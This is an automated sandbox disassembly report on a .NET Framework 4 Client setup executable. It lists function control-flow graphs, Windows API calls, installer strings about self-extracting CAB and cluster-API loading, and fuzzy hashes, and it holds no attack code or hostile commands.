                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001CA78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 0001CACB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: 90bafad1c3b892b88532a8396776877c367ca7160600d2d9746857f75f20a6b1
                                                                                                                                                                    • Instruction ID: 216f419f1f52a9b85f161381fae4e6c2fbd23f88e88a3d694792868978dbdc2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 90bafad1c3b892b88532a8396776877c367ca7160600d2d9746857f75f20a6b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 58F0B7B5900B458BC320DF6AC844ADBFBF8BF88308F50491ED8BA93210D7B4A5898F50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00015E0B Relevance: 59.7, APIs: 18, Strings: 16, Instructions: 220synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 15e0b-15e48 call 2de40 call 195c3 5 15e54-15e63 call 19663 0->5 6 15e4a-15e4f 0->6 11 15e65-15e6a 5->11 12 15e6f-15e7b call 199d2 5->12 7 1603d-16045 call 1854a 6->7 15 1606e-16073 7->15 11->7 19 15e87-15e9c SetEnvironmentVariableW 12->19 20 15e7d-15e82 12->20 17 16075-16076 call 19663 15->17 18 1607b-1607f 15->18 17->18 22 16081-16084 call 18e6f 18->22 23 16089-1608d 18->23 24 15ec9-15ed5 SetEnvironmentVariableW 19->24 25 15e9e-15ea8 GetLastError 19->25 20->7 22->23 27 16097-16099 23->27 28 1608f-16092 call 18e6f 23->28 33 15f02-15f11 SetEnvironmentVariableW 24->33 34 15ed7-15ee1 GetLastError 24->34 31 15eb8 25->31 32 15eaa-15eb6 25->32 29 160a1-160a7 27->29 30 1609b-1609c call 18e6f 27->30 28->27 30->29 41 15eba 31->41 42 15ebf-15ec4 31->42 32->31 39 15f13-15f1d GetLastError 33->39 40 15f3e-15f44 33->40 36 15ef1 34->36 37 15ee3-15eef 34->37 43 15ef3 36->43 44 15ef8-15efd 36->44 37->36 45 15f2d 39->45 46 15f1f-15f2b 39->46 47 15f81-15f91 call 19779 40->47 48 15f46-15f54 SetEnvironmentVariableW 40->48 41->42 42->7 43->44 44->7 50 15f34-15f39 45->50 51 15f2f 45->51 46->45 56 15f93-15f98 47->56 57 15f9d-15fdc call 184c7 CreateProcessW 47->57 48->47 52 15f56-15f60 GetLastError 48->52 50->7 51->50 54 15f70 52->54 55 15f62-15f6e 52->55 58 15f72 54->58 59 15f77-15f7c 54->59 55->54 56->7 62 15fea 57->62 63 15fde-15fe8 57->63 58->59 59->7 64 15fed-15ff7 GetTopWindow 62->64 63->7 65 16016-1601a 64->65 66 15ff9-1600b GetWindowThreadProcessId 65->66 67 1601c-1602b Sleep 65->67 68 1602d-16036 call 168fb 66->68 69 1600d-16010 GetWindow 66->69 67->64 67->68 72 16047-1606c WaitForSingleObject GetExitCodeProcess CloseHandle * 2 68->72 73 16038 68->73 69->65 72->15 73->7
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00015E2A
                                                                                                                                                                      • Part of subcall function 000195C3: GetCurrentDirectoryW.KERNEL32(00000040,00000000,00000000,00000000,X?f,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?), ref: 000195E8
                                                                                                                                                                      • Part of subcall function 000195C3: GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000), ref: 00019607
                                                                                                                                                                      • Part of subcall function 000195C3: GetLastError.KERNEL32(?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000,?,?,00015B53), ref: 0001960D
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 0001604C
                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00016058
                                                                                                                                                                    • CloseHandle.KERNEL32(00015BB4,?,?,?,?,?,?), ref: 00016067
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0001606C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get the name of the module, xrefs: 00015E7D
                                                                                                                                                                    • Executing command line: '%S', xrefs: 00015FA2
                                                                                                                                                                    • Failed to start the process, xrefs: 00015FE3
                                                                                                                                                                    • 2, xrefs: 00016027
                                                                                                                                                                    • Failed to stop reporting progress, xrefs: 00016038
                                                                                                                                                                    • _SFX_CAB_EXE_PARAMETERS, xrefs: 00015F08
                                                                                                                                                                    • Failed to set _SFX_CAB_EXE_PACKAGE, xrefs: 00015EF8
                                                                                                                                                                    • Failed to get current directory, xrefs: 00015E4A
                                                                                                                                                                    • Failed to set _SFX_CAB_EXE_PARAMETERS, xrefs: 00015F34
                                                                                                                                                                    • _SFX_CAB_EXE_PACKAGE, xrefs: 00015ECC
                                                                                                                                                                    • _SFX_CAB_EXE_PATH, xrefs: 00015E93
                                                                                                                                                                    • __COMPAT_LAYER, xrefs: 00015F4B
                                                                                                                                                                    • Failed to set _SFX_CAB_EXE_PATH, xrefs: 00015EBF
                                                                                                                                                                    • Failed to set __COMPAT_LAYER, xrefs: 00015F77
                                                                                                                                                                    • Failed to set target directory, xrefs: 00015E65
                                                                                                                                                                    • Unable to resolve the path of the exe, xrefs: 00015F93
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCurrentDirectoryHandle$CodeErrorExitLastObjectProcessSingleWait_memset
                                                                                                                                                                    • String ID: 2$Executing command line: '%S'$Failed to get current directory$Failed to get the name of the module$Failed to set _SFX_CAB_EXE_PACKAGE$Failed to set _SFX_CAB_EXE_PARAMETERS$Failed to set _SFX_CAB_EXE_PATH$Failed to set __COMPAT_LAYER$Failed to set target directory$Failed to start the process$Failed to stop reporting progress$Unable to resolve the path of the exe$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$__COMPAT_LAYER
                                                                                                                                                                    • API String ID: 3070882113-3483177241
                                                                                                                                                                    • Opcode ID: 56030f64cce282e52bf536c15cb6d4ed237f084c6b21bec71dcc651b350709de
                                                                                                                                                                    • Instruction ID: 2949af744e6f75cd328a362fe0284d1aeeb62be1c07f6536516a9788e0a7d8fe
                                                                                                                                                                    • Opcode Fuzzy Hash: 56030f64cce282e52bf536c15cb6d4ed237f084c6b21bec71dcc651b350709de
                                                                                                                                                                    • Instruction Fuzzy Hash: 1A61D372D40625FFDB225BA48C05AEEBAA8AF48751F124125FE10FB291D7758EC18B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001805A Relevance: 50.9, APIs: 14, Strings: 15, Instructions: 161COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 74 1805a-18074 75 18228-18232 74->75 76 1807a-1808f call 187eb 74->76 77 18234-18237 call 18e6f 75->77 78 1823c-18240 75->78 85 18091-18096 76->85 86 1809b-180a7 GetSystemDirectoryW 76->86 77->78 81 18242-18245 call 18e6f 78->81 82 1824a-1824e 78->82 81->82 87 1821e-1821f call 1854a 85->87 88 180d4-180d6 86->88 89 180a9-180b3 GetLastError 86->89 95 18224-18227 87->95 91 180d8-180e6 call 187eb 88->91 92 180fa-18112 call 18b7e 88->92 93 180c3 89->93 94 180b5-180c1 89->94 91->85 102 180e8-180f4 GetSystemDirectoryW 91->102 103 18114-18119 92->103 104 1811e-1812b LoadLibraryW 92->104 98 180c5 93->98 99 180ca-180cf 93->99 94->93 95->75 98->99 99->87 102->89 105 180f6-180f8 102->105 103->87 106 18158-1816d GetProcAddress 104->106 107 1812d-18137 GetLastError 104->107 105->89 105->92 108 18173-18182 GetProcAddress 106->108 109 181f8-18202 GetLastError 106->109 110 18147 107->110 111 18139-18145 107->111 108->109 112 18184-18193 GetProcAddress 108->112 113 18212 109->113 114 18204-18210 109->114 115 18149 110->115 116 1814e-18153 110->116 111->110 112->109 117 18195-181a4 GetProcAddress 112->117 118 18214 113->118 119 18219 113->119 114->113 115->116 116->87 117->109 120 181a6-181b5 GetProcAddress 117->120 118->119 119->87 120->109 121 181b7-181c6 GetProcAddress 120->121 121->109 122 181c8-181d7 GetProcAddress 121->122 122->109 123 181d9-181e8 GetProcAddress 122->123 123->109 124 181ea-181f1 call 184c7 123->124 126 181f6 124->126 126->95
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0001809F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000180A9
                                                                                                                                                                    Strings
                                                                                                                                                                    • OpenCluster, xrefs: 0001815E
                                                                                                                                                                    • ClusterEnum, xrefs: 000181A6
                                                                                                                                                                    • Failed to load clusapi.dll, xrefs: 0001814E
                                                                                                                                                                    • %s\clusapi.dll, xrefs: 00018100
                                                                                                                                                                    • CloseCluster, xrefs: 00018173
                                                                                                                                                                    • ClusterOpenEnum, xrefs: 00018184
                                                                                                                                                                    • Failed to allocate the path ro the clusapi.dll, xrefs: 00018114
                                                                                                                                                                    • Failed to allocate the system directory, xrefs: 00018091
                                                                                                                                                                    • ClusterCloseEnum, xrefs: 00018195
                                                                                                                                                                    • Failed to get the system directory, xrefs: 000180CA
                                                                                                                                                                    • CloseClusterResource, xrefs: 000181C8
                                                                                                                                                                    • Successfully bound to the ClusApi.dll, xrefs: 000181EA
                                                                                                                                                                    • ClusterResourceControl, xrefs: 000181D9
                                                                                                                                                                    • Failed to load all required functions from the clusapi.dll, xrefs: 00018219
                                                                                                                                                                    • OpenClusterResource, xrefs: 000181B7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocDirectoryErrorLastProcessSystem
                                                                                                                                                                    • String ID: %s\clusapi.dll$CloseCluster$CloseClusterResource$ClusterCloseEnum$ClusterEnum$ClusterOpenEnum$ClusterResourceControl$Failed to allocate the path ro the clusapi.dll$Failed to allocate the system directory$Failed to get the system directory$Failed to load all required functions from the clusapi.dll$Failed to load clusapi.dll$OpenCluster$OpenClusterResource$Successfully bound to the ClusApi.dll
                                                                                                                                                                    • API String ID: 1959106193-2729475906
                                                                                                                                                                    • Opcode ID: a915a79d9bd6ba203b06d053eda69e225866d2082555dcd125d05fef5fbd9bd9
                                                                                                                                                                    • Instruction ID: 9159f3f8e560695f48664561efc59666e076cdc48236ad701d080445d56fd81c
                                                                                                                                                                    • Opcode Fuzzy Hash: a915a79d9bd6ba203b06d053eda69e225866d2082555dcd125d05fef5fbd9bd9
                                                                                                                                                                    • Instruction Fuzzy Hash: A141177AA40706BAE75357749C85BE939ED9F84314F218035EB04E7191EFB8CBC58B10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001676F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 319 1676f-16781 320 16783-16788 319->320 321 1678d-1679f 319->321 322 168f1-168f3 320->322 323 167a5-167e3 GetModuleHandleW call 19166 InitializeCriticalSection CreateEventA 321->323 324 1689b 321->324 330 16812-16829 CreateThread 323->330 331 167e5-167f0 GetLastError 323->331 326 168a1-168a4 324->326 328 168a6-168ac 326->328 329 168ec-168f0 326->329 332 168bf-168c6 328->332 333 168ae-168b9 DeleteCriticalSection 328->333 329->322 336 16862-16899 WaitForSingleObject SendMessageA * 2 330->336 337 1682b-16836 GetLastError 330->337 338 167f2-167fc 331->338 339 167ff-16802 331->339 334 168c8-168c9 call 18e6f 332->334 335 168ce-168db 332->335 333->332 334->335 343 168e0-168e7 335->343 344 168dd-168de CloseHandle 335->344 336->324 345 16845-16848 337->345 346 16838-16842 337->346 338->339 340 16804 339->340 341 1680b-16810 339->341 340->341 347 16856-16860 call 1854a 341->347 343->329 348 168e9-168ea CloseHandle 343->348 344->343 349 16851 345->349 350 1684a 345->350 346->345 347->326 348->329 349->347 350->349
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000167A6
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0003BF10,00000000,000001F4,?,?,0001635A,00000000,00000002,?,?,?,?,?,?,?,00015B83), ref: 000167C6
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000167D6
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0001635A,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 000167E5
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(0003BF10,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000168B3
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000168DE
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000168EA
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create the UI thread, xrefs: 00016851
                                                                                                                                                                    • Failed to create progress reporting initialization event, xrefs: 0001680B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$CloseCriticalSection$CreateDeleteErrorEventInitializeLastModule
                                                                                                                                                                    • String ID: Failed to create progress reporting initialization event$Failed to create the UI thread
                                                                                                                                                                    • API String ID: 2625854008-3587447334
                                                                                                                                                                    • Opcode ID: c4b20cfa6cc0885b59f1b66b912e0cb3be02248c0b6a82e80bfe9c03af07a373
                                                                                                                                                                    • Instruction ID: 097af7f7de35b5b4a8ef9e3e6d6ef6b3f14508d53f78ee1531993d0dd985c733
                                                                                                                                                                    • Opcode Fuzzy Hash: c4b20cfa6cc0885b59f1b66b912e0cb3be02248c0b6a82e80bfe9c03af07a373
                                                                                                                                                                    • Instruction Fuzzy Hash: D141AF70901224EFF7229F64DC48CDE7AACFB05750B20852AF611F7161DB798AC0DBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00016A56 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 124windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 353 16a56-16a69 354 16b1d-16b24 353->354 355 16a6f 353->355 356 16b76-16b86 GetDlgItem 354->356 357 16b26-16b27 354->357 355->356 358 16a75-16a79 355->358 360 16bc8-16bce 356->360 361 16b88-16b92 GetLastError 356->361 357->356 359 16b29-16b2e 357->359 362 16b14-16b1b PostQuitMessage 358->362 363 16a7f-16a82 358->363 365 16bc4-16bc6 359->365 366 16b34-16b44 GetDlgItem 359->366 367 16bcf-16bd0 SendMessageW 360->367 368 16ba2 361->368 369 16b94-16ba0 361->369 364 16abb-16abe 362->364 370 16af0-16afe call 16be1 363->370 371 16a84-16a89 363->371 364->365 374 16bd6-16bd9 365->374 372 16b46-16b50 GetLastError 366->372 373 16b6e-16b74 366->373 367->374 376 16ba4 368->376 377 16ba9 368->377 369->368 392 16b00-16b06 370->392 393 16b08-16b12 KiUserCallbackDispatcher 370->393 378 16ac3-16acd 371->378 379 16a8b-16a8c 371->379 382 16b60 372->382 383 16b52-16b5e 372->383 373->367 376->377 380 16bae-16bb8 call 1854a 377->380 384 16adc-16aee SetEvent 378->384 385 16acf-16ad2 378->385 379->365 381 16a92-16a98 379->381 380->365 396 16bba-16bbe EndDialog 380->396 381->365 388 16a9e-16aac call 16be1 381->388 389 16b62 382->389 390 16b67-16b6c 382->390 383->382 384->364 385->384 391 16ad4-16ad6 SetWindowTextW 385->391 388->364 398 16aae-16ab5 SendMessageA 388->398 389->390 390->380 391->384 392->364 392->393 393->364 396->365 398->364
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00016AB5
                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00016AD6
                                                                                                                                                                    • SetEvent.KERNEL32 ref: 00016AE8
                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00016B0C
                                                                                                                                                                      • Part of subcall function 00016BE1: EnterCriticalSection.KERNEL32(0003BF10,?,?,?,00016AF8,?), ref: 00016BF2
                                                                                                                                                                      • Part of subcall function 00016BE1: MessageBoxW.USER32(?,00000000,00000024,0000000B), ref: 00016C28
                                                                                                                                                                      • Part of subcall function 00016BE1: LeaveCriticalSection.KERNEL32(0003BF10,?,?,00016AF8,?), ref: 00016C3E
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00016B15
                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00016B3C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00016B46
                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00016B7E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00016B88
                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00016BBE
                                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,?), ref: 00016BD0
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get status static control., xrefs: 00016B67
                                                                                                                                                                    • Failed to get progress bar control., xrefs: 00016BA9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$CriticalErrorItemLastSectionSend$CallbackDialogDispatcherEnterEventLeavePostQuitTextUserWindow
                                                                                                                                                                    • String ID: Failed to get progress bar control.$Failed to get status static control.
                                                                                                                                                                    • API String ID: 1786187333-1184021424
                                                                                                                                                                    • Opcode ID: fc7678d1204c2e23627191f6c31296757eaeddd6f2b276731484c94fc95c7d7a
                                                                                                                                                                    • Instruction ID: 4f53e11c9904270a081f6154a47b676e9f2fc039b7ba110a9aa023f3bcee49c9
                                                                                                                                                                    • Opcode Fuzzy Hash: fc7678d1204c2e23627191f6c31296757eaeddd6f2b276731484c94fc95c7d7a
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C411132808525ABEB726F54DC88DE93AA5EF81350B158121FE05F70A1E77B8ED0DB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001A505 Relevance: 21.1, APIs: 14, Instructions: 135memoryfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 473 1a505-1a531 call 19b6a 476 1a675-1a67b 473->476 477 1a537-1a53d 473->477 478 1a543-1a54d 477->478 479 1a572-1a589 GetProcessHeap RtlReAllocateHeap 478->479 480 1a54f-1a564 GetProcessHeap RtlAllocateHeap 478->480 483 1a603-1a60a 479->483 484 1a58b 479->484 481 1a566-1a56d 480->481 482 1a58e-1a5af ReadFile 480->482 481->476 485 1a5b1-1a5d4 call 1a681 482->485 486 1a60c-1a617 GetLastError 482->486 487 1a658-1a65c 483->487 484->482 485->478 495 1a5da-1a5dc 485->495 490 1a626-1a62a 486->490 491 1a619-1a623 486->491 487->476 489 1a65e-1a66e GetProcessHeap HeapFree 487->489 489->476 493 1a670 call 19a29 489->493 490->487 494 1a62c-1a633 490->494 491->490 493->476 494->487 495->487 497 1a5de-1a5ed GetProcessHeap HeapAlloc 495->497 497->483 498 1a5ef-1a601 GetProcessHeap HeapAlloc 497->498 498->483 499 1a635-1a655 call 31150 * 2 498->499 499->487
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
                                                                                                                                                                      • Part of subcall function 00019B6A: GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00020000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A55A
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,00015AF6,X?f), ref: 0001A55D
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A57E
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,00015AF6,X?f), ref: 0001A581
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0001A5A7
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,00015AF6,?,?), ref: 0001A5E3
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0001A5E6
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,8B000006), ref: 0001A5F7
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0001A5FA
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001A60C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00015AF6,X?f), ref: 0001A663
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,00015AF6,X?f), ref: 0001A666
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocAllocateErrorFileLast$FreePointerRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 15841721-0
                                                                                                                                                                    • Opcode ID: 923783a5a02161f4cd5d2a019e85e3e459cf5be7f64b2d20c66fbc81479b3dd8
                                                                                                                                                                    • Instruction ID: fb98d2a2e38ce7a5480867ca4da80df995e8aadd1feacd8948be0cb13dbd6fc7
                                                                                                                                                                    • Opcode Fuzzy Hash: 923783a5a02161f4cd5d2a019e85e3e459cf5be7f64b2d20c66fbc81479b3dd8
                                                                                                                                                                    • Instruction Fuzzy Hash: DE4105B1E0121AEFDF119FE5C944BEEBBB8FF09344F14805AE604E6250D7789A909B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00017AE7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 566 17ae7-17b0c SetErrorMode * 2 567 17b0f-17b1c call 1746a 566->567 570 17b22-17b3d call 18b7e 567->570 571 17bec-17bf1 567->571 577 17bf3-17bf8 570->577 578 17b43-17b55 call 19926 570->578 572 17bff-17c07 call 1854a 571->572 579 17bc4-17bc7 572->579 577->572 584 17b5b-17b6b CreateDirectoryW 578->584 585 17bfa 578->585 582 17bd1-17bd4 579->582 583 17bc9-17bcc call 18e6f 579->583 587 17bd6-17bd9 call 18e6f 582->587 588 17bde-17be9 SetErrorMode 582->588 583->582 589 17b82-17b84 584->589 590 17b6d-17b76 RemoveDirectoryW 584->590 585->572 587->588 593 17b86-17b87 call 18e6f 589->593 594 17b8c-17b8f 589->594 590->589 592 17b78-17b7c MoveFileExW 590->592 592->589 593->594 596 17b91-17b94 call 18e6f 594->596 597 17b99-17b9c 594->597 596->597 599 17ba6-17baf 597->599 600 17b9e-17ba1 call 18e6f 597->600 602 17bb1-17bbb 599->602 603 17c09-17c0b 599->603 600->599 602->567 604 17bc1-17bc3 602->604 603->588 604->579
                                                                                                                                                                    APIs
